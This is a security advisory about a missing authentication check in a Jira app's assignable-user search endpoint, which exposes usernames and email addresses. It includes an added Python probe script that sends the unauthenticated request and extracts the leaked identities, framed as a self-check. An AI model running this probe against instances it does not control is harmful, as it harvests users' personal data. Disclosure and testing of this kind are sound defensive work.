Advisory Release Date



License & User Deactivator for Jira

Affected License & User Deactivator for Jira versions

4.8.1 - 4.10.2

Fixed License & User Deactivator for Jira versions

4.10.4 and upcoming versions

CVSS Score (Base Score / Temporal Score): 5.3


This advisory discloses a medium severity security vulnerability in License & User Deactivator for Jira, present since version 4.8.1, that affects instances using the app's License Optimizer functionality for Jira Service Management.


When the License Optimizer functionality for Jira Service Management is in use and a user who currently has no access needs to be assigned to an issue, License Optimizer overrides the response of the Jira endpoint /rest/api/latest/user/assignable/search.

That override was missing an authentication and authorization check: a caller who was not logged in, or who had no access to the specific JSM project, could use this REST request to retrieve the list of users that can be assigned to an issue in that project.

The JSON response contains usernames and email addresses, among a few other user properties. An excerpt of one returned entry:

      "displayName":"Service Desk Agent",


To retrieve such a response as an unauthenticated user, the request still has to supply all of the following parameters:

  • a valid project key of a JSM project
  • a valid key of an issue in that project
  • a non-empty search term in the username parameter of the request that matches users holding the Service Desk Team project role
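The following script is an added example for checking your own instance against the behaviour described above; it is not code from this advisory or from the app vendor. The endpoint and the three required inputs (project key, issue key, non-empty search term) come from the advisory text. The query-parameter names `project`, `issueKey` and `username` are the standard Jira Server/Data Center ones and are an assumption here, as are the host name and the sample response bodies, which are constructed for the offline test and not captured from any real instance.

```python
"""
Anonymous probe for the assignable-user lookup described in this advisory.

Added example, not the advisory's or the vendor's code. Query-parameter names
(project, issueKey, username) are assumed to be the standard Jira Server/DC ones.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

ENDPOINT = "/rest/api/latest/user/assignable/search"


def build_probe_url(base_url, project_key, issue_key, search_term):
    """Compose the unauthenticated request: a valid JSM project key, a valid
    issue key in that project and a non-empty search term, as the advisory
    lists. An empty term is rejected here because the advisory states the
    response is only produced for a non-empty term."""
    if not search_term:
        raise ValueError("search term must be non-empty")
    query = urllib.parse.urlencode(
        {"project": project_key, "issueKey": issue_key, "username": search_term}
    )
    return base_url.rstrip("/") + ENDPOINT + "?" + query


def classify_response(status, body_text):
    """Classify what an anonymous caller got back.

    'denied'   - 401/403: the authentication check is in place
    'no_match' - 200 with an empty list: nothing was disclosed for this term
    'leak'     - 200 with user objects carrying a username or email address,
                 which is the behaviour the advisory describes
    'unknown'  - anything else (non-JSON body, unexpected status)
    """
    if status in (401, 403):
        return "denied"
    if status != 200:
        return "unknown"
    try:
        data = json.loads(body_text)
    except ValueError:
        return "unknown"
    if not isinstance(data, list):
        return "unknown"
    if not data:
        return "no_match"
    leaked = [u for u in data
              if isinstance(u, dict) and (u.get("emailAddress") or u.get("name"))]
    return "leak" if leaked else "unknown"


def leaked_identities(body_text):
    """Extract (username, email, displayName) triples from a leaking body."""
    data = json.loads(body_text)
    return [(u.get("name"), u.get("emailAddress"), u.get("displayName"))
            for u in data if isinstance(u, dict)]


def probe(base_url, project_key, issue_key, search_term, timeout=10):
    """Send the request without any credentials and classify the answer."""
    url = build_probe_url(base_url, project_key, issue_key, search_term)
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read().decode("utf-8", "replace"))


# Constructed sample bodies (not captured from a real instance), shaped after the
# advisory's description: username, email address and a few other properties.
SAMPLE_LEAK = json.dumps([
    {"name": "sd.agent", "emailAddress": "sd.agent@example.com",
     "displayName": "Service Desk Agent", "active": True},
])
SAMPLE_DENIED = json.dumps({"errorMessages": ["You are not authenticated."], "errors": {}})


if __name__ == "__main__":
    # Usage: probe.py https://jira.example.com SD SD-1 a   (all values assumed)
    if len(sys.argv) != 5:
        sys.exit("usage: probe.py <base_url> <project_key> <issue_key> <search_term>")
    print(probe(*sys.argv[1:]))
```

Run it against a project key and issue key you own, with a one-letter search term so that any Service Desk Team member matches. A result of `leak` from an unauthenticated run means the override is still answering anonymous callers and the app needs updating; `denied` is the expected result on a fixed version.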

What You Need to Do

Please update the app to version 4.10.4 or later.


If you have questions or concerns regarding this advisory, please raise a support request via our Support Portal.